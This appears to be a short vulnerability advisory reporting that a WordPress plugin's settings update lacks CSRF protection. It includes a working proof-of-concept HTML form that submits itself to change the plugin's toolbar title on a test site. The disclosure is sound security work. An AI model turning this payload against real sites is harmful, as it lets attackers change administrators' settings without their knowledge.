Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Make an admin open an HTML page with the following HTML:
```
<form action="https://wps-test.ddev.site/wp-admin/admin.php?page=mypanel&do=submit" method="POST">
<input type="text" name="bdaia_t_title" value="CSRF Title">
</form>
<script> document.forms[0].submit(); </script>
```
See that the plugin's "Header Options > Toolbar Options > Title" has been updated to `CSRF Title`